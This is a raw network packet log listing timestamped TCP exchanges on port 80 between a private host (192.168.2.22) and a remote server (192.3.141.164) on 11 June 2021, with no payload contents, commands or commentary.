Jun 11, 2021 15:59:28.404567003 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.404567003 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.404608965 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.404647112 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.404647112 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.404659033 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.404686928 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.404695034 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.404725075 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.404730082 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.404773951 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.404783964 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.404818058 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.404823065 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.404855967 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.404864073 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.404895067 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.404900074 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.404933929 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.404942989 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.404970884 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.404979944 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.405013084 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.405019999 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.405054092 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.405071974 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.405106068 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.405114889 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.405149937 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.405159950 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.405188084 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.405204058 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.405226946 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.405240059 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.405266047 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.405278921 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.405303955 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.405317068 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.405343056 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.405355930 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.405380964 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.405391932 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.405427933 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.405461073 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.405486107 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.405503988 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.405539989 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.405543089 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.405555010 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.405580997 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.405595064 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.405627012 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.405627966 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.405669928 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.405678034 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.405708075 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.405719042 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.405745983 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.405755997 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.405786037 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.405791044 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.405822992 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.405832052 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.405864954 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.405868053 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.405903101 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.405910015 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.405951023 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.405951977 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.405992031 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.405996084 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.406029940 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.406038046 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.406069040 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.406075001 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.406107903 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.406116009 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.406142950 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.406155109 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.406183004 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.406193018 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.406220913 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.406230927 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.406267881 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.406270027 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.406311989 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.406316042 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.406348944 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.406368971 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.406388044 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.406395912 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.406430960 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.406445026 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.406469107 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.406485081 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.406507969 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.406521082 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.406546116 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.406594038 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.406634092 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.406636953 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.406676054 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.406708956 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.406716108 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.406754017 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.406754017 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.406759977 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.406794071 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.406829119 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.406832933 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.406843901 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.406855106 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.406871080 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.406877041 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.406883001 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.406919003 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.406927109 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.406961918 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.406970024 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.407001019 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.407042027 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.407062054 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.407082081 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.407083035 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.407104015 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.407156944 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.407196045 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.407207966 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.407224894 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.407234907 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.407274008 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.407340050 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.407354116 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.407361984 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.408504963 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.409625053 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.409663916 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.409679890 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.409696102 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.409706116 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.409727097 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.409745932 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.409773111 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.412986040 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.413638115 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.542733908 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.542798996 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.542835951 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.542840004 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.542877913 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.542881012 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.542884111 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.542918921 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.542944908 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.542968035 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.543001890 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.543031931 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.543073893 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.543107986 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.543132067 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.543142080 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.543199062 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.543205976 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.543239117 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.543278933 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.543294907 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.543325901 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.543327093 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.543349028 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.543369055 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.543386936 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.543420076 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.543443918 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.543467999 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.543507099 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.543510914 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.543551922 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.543581009 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.543591022 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.543631077 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.543632984 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.543656111 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.543668032 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.543706894 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.543706894 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.543746948 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.543751955 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.543793917 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.543795109 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.543838024 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.543863058 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.543876886 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.543889046 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.543917894 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.543926954 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.543977976 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.547358990 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.547416925 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.547439098 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.547458887 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.547463894 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.547497034 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.547527075 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.547535896 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.547550917 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.547585011 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.547599077 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.547635078 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.547642946 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.547697067 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.547771931 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.547815084 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.547831059 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.547852039 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.547873974 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.547889948 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.547913074 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.547928095 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.547960043 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.547971964 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.547975063 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.548017979 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.548038006 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.548054934 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.548079967 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.548094988 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.548116922 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.548166037 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.549022913 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.549063921 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.549093008 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.549101114 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.549118042 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.549140930 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.549164057 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.549180984 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.549201965 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.549220085 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.549240112 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.549261093 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.549280882 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.549300909 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.549324036 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.549348116 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.549365997 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.549390078 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.549417973 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.549427986 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.549443960 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.549468994 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.549490929 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.549509048 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.549532890 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.549549103 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.549575090 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.549590111 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.549612999 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.549629927 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.549653053 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.549679041 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.549684048 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.549721956 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.549741983 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.549760103 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.549786091 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.549799919 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.549841881 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.549844027 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.549851894 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.549881935 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.549900055 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.549920082 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.549943924 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.549957991 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.549983025 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.550005913 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.550023079 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.550046921 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.550066948 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.550085068 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.550110102 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.550124884 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.550143003 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.550163031 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.550178051 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.550200939 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.550221920 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.550241947 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.550260067 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.550281048 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.550297976 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.550333023 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.550348043 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.550375938 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.550406933 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.550412893 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.550420046 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.550452948 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.550471067 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.550493956 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.550498962 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.550530910 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.550549030 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.550578117 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.550585985 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.550618887 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.550668001 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.550668001 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.550709963 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.550729036 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.550739050 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.550749063 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.550754070 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.550787926 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.550817966 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.550827026 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.550841093 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.550863981 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.550894976 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.550925016 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.550955057 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.550995111 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.551000118 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.551014900 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.551033974 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.551050901 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.551073074 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.551096916 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.551110029 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.551120996 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.551177025 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.551192999 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.551215887 CEST	80	49174	192.3.141.164	192.168.2.22
